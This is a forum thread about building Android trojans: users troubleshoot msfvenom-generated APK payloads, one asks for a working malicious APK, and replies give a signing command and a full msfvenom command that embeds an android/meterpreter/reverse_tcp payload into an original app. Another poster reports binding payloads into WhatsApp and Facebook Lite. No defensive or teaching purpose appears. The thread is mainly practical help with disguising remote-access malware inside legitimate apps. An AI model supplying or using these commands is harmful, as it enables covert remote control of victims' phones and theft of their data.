Forum Thread: Problem with .Apk Payloads

Tried making some .apk payloads but every single one I made is not working properly. I tried making payloads and remaking original .apk files using msfvenom. When I try to install it it says: Parse error: There is problem parsing the package. I also tried it using some ruby script but same problem occurred. It happens on multiple devices. Anyone knows what I'm doing wrong?

P.S. If anyone have some .apk payload which works properly could you share it with me?

6 Responses

Since Android apps are based on Java, APK's contains Dalvik Bytecode which isn't compatible with any shellcode based payloads and / or encoders. I don't know weather Metasploit comes with special Android payloads, but don't expect to get your average reverse tcp meterpreter payload running.

can you post the code that you're using so we can help you to find the problem

assuming you are using ruby script to automate payload generation, are you signing the apk's before installing?
use the command d2j-apk-sign yourpayload.apk

hello friends my name is yagnesh ... *i have bind payload apk in whatsapp and install perfectly when i try to open it it says whatsapp not risponding and in samsung j2 i have try to install bind facebook lite but not install and also sign thise apk

Hello, I thought I should share my thoughts, I always embed original apk with payload just by entering these command:
msfvenom -x apkname.apk -p android/meterpreter/reverse_tcp lport=4444 lhost=yourip -o output file name.apk
If you don't have zipalign then install it
It's so easy in Kali 2017.1
Hope I could help, I was successful in embedding payload in almost every original apk

Share Your Thoughts

  • Hot
  • Active